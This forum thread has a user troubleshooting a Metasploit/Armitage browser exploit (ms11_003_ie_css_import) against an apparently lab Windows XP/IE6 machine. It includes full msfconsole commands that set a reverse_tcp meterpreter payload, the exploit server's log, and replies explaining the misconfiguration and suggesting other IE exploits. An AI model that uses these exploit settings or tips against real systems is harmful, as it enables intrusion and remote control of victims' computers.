tony1grendel Posted September 2, 2011 Share Posted September 2, 2011 Hey,guys. I really hope somebody could help me out here. I am running linux, Ubuntu 10.04 I have mysql installed and database msf3 configured. I have the metsaploit framework installed I have armitage installed. I run the msfrpc daemon: (with no SSL and type Basic) sudo msfrpcd -f -U msf -P test -a 127.0.0.1 -t Basic -S I get the following output: [*] XMLRPC starting on 127.0.0.1:55553 (NO SSL):Basic... [*] XMLRPC ready at 2011-09-02 13:20:16 -0500. I assume everything is good here then I run gksudo armitage Uncheck SSL and select mysql I hit Connect, Armitage loads, I do an nmap on my IP range. See the target computer I have that i'm testing My target PC is a Dell, Pentium 4 Processor, running Windows XP Pro SP3 with IE6 Then I select exploit: ms11_003_ie_css_import I edit the following settings to the following values: SRVPORT:80 URIPATH: / *LPORT: 443 I put an asterisk by the last setting because I ran the exploit with the default port (I believe 4444, and then with 443, and then again with 23) Every time I changed the port number I terminated and restarted msfrpcd and armitage With each time I get the same results: (after the target logs onto the IP address in IE6) msf > use exploit/windows/browser/ms11_003_ie_css_import msf > set SSLVersion SSL3 SSLVersion => SSL3 msf exploit(ms11_003_ie_css_import) > set LHOST 10.12.5.48 LHOST => 10.12.5.48 msf exploit(ms11_003_ie_css_import) > set DisablePayloadHandler true DisablePayloadHandler => true msf exploit(ms11_003_ie_css_import) > set LPORT 443 LPORT => 443 msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms11_003_ie_css_import) > set SSL 0 SSL => 0 msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms11_003_ie_css_import) > set TARGET 0 TARGET => 0 msf exploit(ms11_003_ie_css_import) > set SRVHOST 0.0.0.0 SRVHOST => 0.0.0.0 msf exploit(ms11_003_ie_css_import) > set URIPATH / URIPATH => / msf exploit(ms11_003_ie_css_import) > set OBFUSCATE 1 OBFUSCATE => 1 msf exploit(ms11_003_ie_css_import) > exploit -j [*] Exploit running as background job. [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://10.12.5.48:80/ [*] Server started. [*] 10.12.5.114:2156 Received request for "/" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect [*] 10.12.5.114:2156 Received request for "/C3QEIDn.html" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML [*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL [*] 10.12.5.114:2156 Received request for "/iexplore.exe.config" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS [*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS Everything runs except for the metrepeter session, I don't compromise my target I don't get red lightning bolts surrounding the image of the target IP. It seems like I'm doing everything that should be done. What am I doing wrong. I changed the port numbers because I believe it may be that the network is blocking certain ports. But 443 and 23 should work Quote Link to comment Share on other sites More sharing options...
hexophrenic Posted September 2, 2011 Share Posted September 2, 2011 Do you have .Net 2.0 installed on the client? Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted September 3, 2011 Share Posted September 3, 2011 What happens if you type the ip address of your attacker's machine into your victims's web browser. Quote Link to comment Share on other sites More sharing options...
tony1grendel Posted September 3, 2011 Author Share Posted September 3, 2011 sorry, I should have been more specific the last lines appear when the the attacker's IP is entered into the victim's browser everything after: [*] Server started. [*] 10.12.5.114:2156 Received request for "/" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect [*] 10.12.5.114:2156 Received request for "/C3QEIDn.html" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML [*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL [*] 10.12.5.114:2156 Received request for "/iexplore.exe.config" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS [*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80" [*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS all that is what happens. Quote Link to comment Share on other sites More sharing options...
rsmudge Posted September 3, 2011 Share Posted September 3, 2011 If you're launching this exploit through Armitage's module launcher, then beware that Armitage will try to configure the payload for you. By default, LPORT is set to some random value. You'll also notice that DisablePayloadHandler is set to true by default as well. Together, these values instruct Metasploit to not start a new payload handler when launching the attack and to instruct meterpreter to connect back to that random port number (which by the way, isn't so random--Armitage has a meterpreter listener running there already). If you don't change LPORT and everything else is ok with the targeted environment, it'll work. If you want to change LPORT, go ahead. Just be sure to set DisablePayloadHandler to false. Optionally, double click the Payload option name (it'll have a thick cross next to it). This will open up a dialog to let you choose what kind of payload you want and whether a listener exists or should be started. This will update all of the payload related options at once and you can tweak from there. This is explained in the documentation too. http://www.fastandeasyhacking.com/manual Now on to the exploit, be aware of a few things about this one: (1) ms11_003_ie_css_import does not like to be served over SSL. In my experience you won't get code execution when this happens (2) The ms11_003_ie_css_import requires that .NET 2.0 is installed on the target machine (necessary for the exploit) (3) The exploit does not trigger twice. If you use it, you have to reboot before you try it again. Since you're going after IE6, this exploit is not what I would use. I recommend trying ie_createobject or the ms10_002_aurora exploit Good luck. Quote Link to comment Share on other sites More sharing options...
tony1grendel Posted September 4, 2011 Author Share Posted September 4, 2011 THANK YOU SO SO MUCH rsmudge! Hats off to you! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.